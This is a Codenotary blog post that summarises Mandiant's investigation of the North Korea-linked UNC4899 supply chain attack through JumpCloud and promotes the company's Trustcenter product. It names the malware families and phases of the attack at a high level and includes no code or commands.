Codenotary Trustcenter Blog

Decoding the UNC4899 Supply Chain Attack

Written by Mahrukh | Aug 15, 2023 10:57:19 AM

In July 2023, cybersecurity firm Mandiant Consulting sprung into action to investigate a significant supply chain compromise that had targeted a prominent US-based software solutions provider. The findings of this investigation shed light on a multifaceted attack executed by UNC4899, with alleged ties to North Korea's Reconnaissance General Bureau (RGB) and a history of cryptocurrency-focused operations.

 

In the tumultuous landscape of cybersecurity threats, this attack has underscored the urgency for comprehensive solutions that safeguard software integrity. Codenotary Trustcenter, with its SBOM and Trust capabilities, equips organizations with the power to preemptively identify unknown and unauthorized components in software. This pivotal solution not only mitigates risks but also ensures the trustworthiness of software, making it a must have in an increasingly complex digital landscape.

 

Let's delve into the UNC4899 attack in an effort to understand the importance of data security in today’s world.

Supply Chain Attack Path

The breach, discovered to have originated through a meticulously orchestrated spear phishing campaign directed at JumpCloud, a well-known zero-trust directory platform service, unveiled the attacker's exploitation of vulnerabilities in JumpCloud's services to gain unauthorized access to downstream systems. Thankfully, the breach itself had limited scope, affecting only a handful of customers and devices.

Attribution to UNC4899 came through the thorough analysis of the attack's technical intricacies and the actor's operational behavior. This North Korean threat actor is believed to be a part of the RGB, specializing in cryptocurrency-focused operations. Remarkably, their approach closely resembles that of TraderTraitor, a financially motivated DPRK threat group known for its targeting of blockchain-related firms. The supply chain attack can be traced through its execution phases, each revealing the extent of UNC4899's capabilities:

Spear Phishing Targeting JumpCloud

The compromise commenced with a spear phishing campaign against JumpCloud. This highly precise attack aimed at exploiting vulnerabilities within JumpCloud's services, allowing unauthorized access and manipulation of downstream systems.

Malicious Ruby Script Execution

A malicious Ruby script was detected on June 27, 2023, initiated through the JumpCloud agent at a downstream customer's system. This script acted as a gateway for malicious data injections, enabling the attacker's foothold.

Identification of Compromise and Forensic Analysis

Mandiant's investigation revealed telltale signs of compromise within the JumpCloud agent log file. Moreover, the attacker's focus on specific OSX Ventura systems running particular versions illuminated their targeted approach.

Exploiting XProtect Behavioral Service

The attacker's utilization of Apple’s XProtect Behavioral Service was highlighted, showing their keen interest in leveraging this service to identify malicious binaries even after deletion or modification.

Backdoor Payloads and Malicious Script Analysis

The initial access was achieved by exploiting JumpCloud's commands framework, followed by the deployment of backdoor payloads, including FULLHOUSE.DOORED and STRATOFEAR, each with distinct functionalities.

Evolution of the TIEDYE Backdoor

Mandiant's analysis revealed the evolutionary nature of the TIEDYE backdoor through its identification of the Mach-O executable named xpc.protect. This backdoor demonstrated an array of capabilities, indicating the attacker's advanced techniques.

DPRK's Cryptocurrency Focus

UNC4899's interest in cryptocurrency became evident through their targeting of MacOS keychains and their reconnaissance efforts towards executives and internal security teams, aligning with DPRK's broader interest in cryptocurrency operations.

Operational Security and Attribution

Mandiant also delved into the operational security practices of UNC4899, including their use of Operational Relay Boxes (ORBs) and VPN providers. These security measures, though at times flawed, unveiled valuable insights into the threat actor's true origins.

A Secure Future with Codenotary Trustcenter

This incident stands as a testament to the persistent cybersecurity challenges posed by threat actors with nation-state affiliations and highlights the need for robust supply chain security measures. As threats evolve, Codenotary Trustcenter defends software integrity and data security, empowering organizations to safeguard their digital realm with unwavering confidence. Codenotary's approach that unknown components are not trusted by default and a review is required to change the trust state avoids the use of new and unreviewed artifacts.